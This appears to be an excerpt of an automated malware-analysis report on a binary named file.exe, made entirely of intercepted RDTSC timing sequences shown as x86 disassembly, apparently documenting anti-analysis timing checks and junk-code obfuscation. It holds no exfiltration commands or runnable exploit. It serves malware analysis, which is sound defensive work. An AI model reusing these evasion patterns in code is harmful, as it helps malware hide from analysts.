              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDAB47 second address: BDAB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8CC4 second address: BD8D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push dword ptr fs:[00000000h] 0x0000000f mov bx, 878Bh 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a mov di, dx 0x0000001d mov eax, dword ptr [ebp+122D0451h] 0x00000023 push FFFFFFFFh 0x00000025 jmp 00007F8934532D15h 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F8934532D18h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD9D3F second address: BD9D59 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F893453D38Ch 0x00000008 jno 00007F893453D386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 ja 00007F893453D38Eh 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDCA41 second address: BDCABC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8934532D0Eh 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F8934532D11h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F8934532D08h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub di, 15A2h 0x00000032 push 00000000h 0x00000034 jno 00007F8934532D0Bh 0x0000003a jnp 00007F8934532D0Ch 0x00000040 and ebx, 62AFA1A2h 0x00000046 push 00000000h 0x00000048 mov di, dx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f js 00007F8934532D06h 0x00000055 pushad 0x00000056 popad 0x00000057 popad 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0A04 second address: BE0A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D38Ah 0x00000009 jg 00007F893453D386h 0x0000000f popad 0x00000010 push ebx 0x00000011 je 00007F893453D386h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0A22 second address: BE0A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007F8934532D16h 0x0000000b jmp 00007F8934532D0Eh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0A42 second address: BE0A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007F893453D39Dh 0x0000000b jmp 00007F893453D395h 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F893453D386h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85CD2 second address: B85CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE1034 second address: BE1049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F893453D391h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDDC72 second address: BDDC8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDCC07 second address: BDCC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D393h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE20DE second address: BE20ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE20ED second address: BE20F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE20F1 second address: BE20FB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE11A6 second address: BE11AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE2387 second address: BE239F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE335E second address: BE340E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D398h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F893453D388h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 movsx edi, cx 0x0000002a push dword ptr fs:[00000000h] 0x00000031 call 00007F893453D38Dh 0x00000036 mov dword ptr [ebp+1246D144h], eax 0x0000003c pop edi 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 sub bh, 0000005Fh 0x00000047 clc 0x00000048 mov eax, dword ptr [ebp+122D0B75h] 0x0000004e mov ebx, dword ptr [ebp+122D37E9h] 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push ecx 0x00000059 call 00007F893453D388h 0x0000005e pop ecx 0x0000005f mov dword ptr [esp+04h], ecx 0x00000063 add dword ptr [esp+04h], 00000016h 0x0000006b inc ecx 0x0000006c push ecx 0x0000006d ret 0x0000006e pop ecx 0x0000006f ret 0x00000070 jmp 00007F893453D38Bh 0x00000075 push eax 0x00000076 jo 00007F893453D394h 0x0000007c push eax 0x0000007d push edx 0x0000007e jnl 00007F893453D386h 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDCC0 second address: BEDCC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE41 second address: BEDE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D396h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE5C second address: BEDE7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8934532D06h 0x0000000a jmp 00007F8934532D15h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE1CE second address: BEE1D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE1D7 second address: BEE1E7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8934532D08h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE1E7 second address: BEE1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 je 00007F893453D386h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF166F second address: BF168D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jnc 00007F8934532D28h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8934532D0Bh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF168D second address: A1FAAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F893453D38Ch 0x0000000f push dword ptr [ebp+122D1091h] 0x00000015 clc 0x00000016 call dword ptr [ebp+122D2BC3h] 0x0000001c pushad 0x0000001d jmp 00007F893453D393h 0x00000022 xor eax, eax 0x00000024 sub dword ptr [ebp+122D19BFh], ecx 0x0000002a mov edx, dword ptr [esp+28h] 0x0000002e sub dword ptr [ebp+122D19BFh], esi 0x00000034 mov dword ptr [ebp+122D2904h], eax 0x0000003a add dword ptr [ebp+122D19BFh], edx 0x00000040 mov esi, 0000003Ch 0x00000045 mov dword ptr [ebp+122D19BFh], edx 0x0000004b sub dword ptr [ebp+122D3525h], esi 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 pushad 0x00000056 jne 00007F893453D38Ch 0x0000005c popad 0x0000005d lodsw 0x0000005f mov dword ptr [ebp+122D2045h], eax 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 cld 0x0000006a mov ebx, dword ptr [esp+24h] 0x0000006e sub dword ptr [ebp+122D3525h], ebx 0x00000074 nop 0x00000075 push ecx 0x00000076 jmp 00007F893453D395h 0x0000007b pop ecx 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f push edx 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF2871 second address: BF2875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF2875 second address: BF2879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF2879 second address: BF288B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F8934532D0Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF288B second address: BF28CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007F893453D397h 0x0000000a pop edx 0x0000000b jmp 00007F893453D390h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F893453D38Dh 0x0000001b pop edi 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF28CF second address: BF28D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF89C9 second address: BF89DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F893453D38Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF89DB second address: BF89E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8CAB second address: BF8CD4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F893453D386h 0x00000008 jbe 00007F893453D386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F893453D395h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8CD4 second address: BF8CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8CD8 second address: BF8CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8CE0 second address: BF8D06 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8934532D08h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8934532D16h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8D06 second address: BF8D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F893453D386h 0x0000000a pop esi 0x0000000b push esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8420A second address: B84214 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF95B second address: BFF97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D397h 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFAFB second address: BFFB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFDD5 second address: BFFDEC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F893453D38Dh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFDEC second address: BFFE11 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F8934532D16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFF2E second address: BFFF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFF32 second address: BFFF36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFF36 second address: BFFF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFF3C second address: BFFF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8934532D15h 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFF5C second address: BFFF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C000BF second address: C000CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8934532D06h 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C000CA second address: C000CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1D76 second address: BD1D7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1D7C second address: BD1D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F893453D38Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1D8E second address: BD1D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2149 second address: BD2153 instructions: 0x00000000 rdtsc 0x00000002 js 00007F893453D38Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2242 second address: BD2246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2246 second address: BD224C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD224C second address: BD2282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F8934532D06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 pushad 0x00000011 jmp 00007F8934532D13h 0x00000016 jo 00007F8934532D08h 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2282 second address: BD228D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F893453D386h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD22D7 second address: BD22DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2324 second address: BD2328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2328 second address: BD233B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F8934532D06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD233B second address: BD238A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F893453D38Ah 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jo 00007F893453D398h 0x00000017 jmp 00007F893453D392h 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e mov edx, 68EB352Eh 0x00000023 cmc 0x00000024 nop 0x00000025 jbe 00007F893453D38Eh 0x0000002b push eax 0x0000002c push esi 0x0000002d jnc 00007F893453D38Ch 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2408 second address: BD240E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD240E second address: BD2412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2B12 second address: BD2B1C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8934532D0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2D66 second address: BD2D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2D6C second address: BD2D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2D70 second address: BD2DCD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F893453D386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F893453D394h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F893453D388h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D3784h], edx 0x00000033 or dh, 00000017h 0x00000036 lea eax, dword ptr [ebp+12485A33h] 0x0000003c movzx edi, si 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2DCD second address: BD2DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C03E5F second address: C03E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C03E65 second address: C03E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C03F93 second address: C03FAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D398h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04151 second address: C04156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C042BC second address: C042F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D396h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F893453D388h 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007F893453D38Ah 0x00000019 jo 00007F893453D392h 0x0000001f jnl 00007F893453D386h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C042F8 second address: C0430E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8934532D0Fh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0430E second address: C04313 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0458A second address: C0458F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FDD0 second address: C0FDF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D393h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jng 00007F893453D386h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FDF0 second address: C0FDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FDF6 second address: C0FE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D38Fh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FE0A second address: C0FE15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F8934532D06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FE15 second address: C0FE23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F893453D386h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FE23 second address: C0FE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0EB44 second address: C0EB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0EB48 second address: C0EB5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jp 00007F8934532D06h 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0EB5A second address: C0EB7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 jnp 00007F893453D395h 0x0000000c jmp 00007F893453D38Dh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0EC9B second address: C0ECA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
